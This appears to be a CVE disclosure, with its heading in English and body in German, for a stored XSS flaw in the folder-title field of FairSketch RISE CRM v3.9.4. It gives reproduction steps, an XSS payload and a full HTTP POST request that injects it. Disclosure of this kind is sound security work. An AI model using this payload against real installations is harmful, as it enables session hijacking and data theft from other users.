
CVE-2025-56807: A Stored Cross Site Scripting (XSS) vulnerability was discovered in FairSketch RISE Ultimate Project Manager & CRM (v3.9.4) in the File Manager functionality.
Eine Stored Cross-Site-Scripting (XSS)-Schwachstelle wurde in FairSketch RISE Ultimate Project Manager & CRM (v3.9.4) in der Dateimanager-Funktionalität entdeckt. Die Schwachstelle liegt im title-Parameter, der beim Erstellen neuer Ordner übermittelt wird. Aufgrund unzureichender Eingabebereinigung kann ein Angreifer HTML/JavaScript-Payloads (z. B. <details/open/ontoggle=prompt(origin)>) injizieren. Der Payload wird im Ordnernamen gespeichert und beim Auflisten von Ordnern im Dateimanager ausgeführt, wodurch die Ausführung beliebigen JavaScript-Codes im Browser jedes Benutzers ermöglicht wird, der den betroffenen Ordner ansieht. Dies kann zu Session-Hijacking und Datenexfiltration führen.
[!NOTE]
Diese Schwachstelle betrifft nicht nur Administratorkonten. Sie kann mit jedem Benutzerkonto ausgenutzt werden, das die Berechtigung zum Erstellen neuer Ordner im Dateimanager hat.
Melden Sie sich mit gültigen Anmeldedaten an.
Navigieren Sie zu Files

Klicken Sie auf Neuer Ordner

Geben Sie den folgenden Payload in das Titel-Feld ein:
<details/open/ontoggle=prompt(origin)>


POST /index.php/clients/save_folder HTTP/1.1
Host: rise.fairsketch.com
Cookie: [redacted]
Content-Length: 99
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: [redacted]
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://rise.fairsketch.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive
id=&parent_id=&context=client&context_id=101&title=%3Cdetails%2Fopen%2Fontoggle%3Dprompt(origin)%3E